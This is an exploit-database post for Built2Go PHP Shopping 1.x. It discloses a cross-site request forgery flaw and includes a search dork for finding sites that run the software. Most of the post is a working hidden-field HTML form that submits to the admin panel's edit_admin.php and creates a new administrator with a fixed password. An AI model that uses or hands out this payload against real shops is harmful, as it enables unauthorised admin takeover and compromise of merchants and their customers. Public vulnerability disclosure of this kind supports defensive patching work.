Home / exploits Built2Go PHP Shopping 1.x Cross Site Request Forgery
Posted on 09 January 2014
Built2Go PHP Shopping v 1.x – CSRF Vulnerability(add admin) ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.built2go.com/ .:. Dork : “Powered by Built2Go PHP Shopping” #################################################################### ===[ Exploit ]=== <form method=”POST” name=”form0″ action=” http://SITE/adminpanel/edit_admin.php”> <input type=”hidden” name=”userid” value=”ADMIN”/> <input type=”hidden” name=”pass” value=”12121212″/> <input type=”hidden” name=”retypepass” value=”12121212″/> <input type=”hidden” name=”addnew” value=”1″/> <input type=”hidden” name=”action” value=”save”/> <input type=”hidden” name=”new” value=”Submit”/> </form> </body> </html> ####################################################################
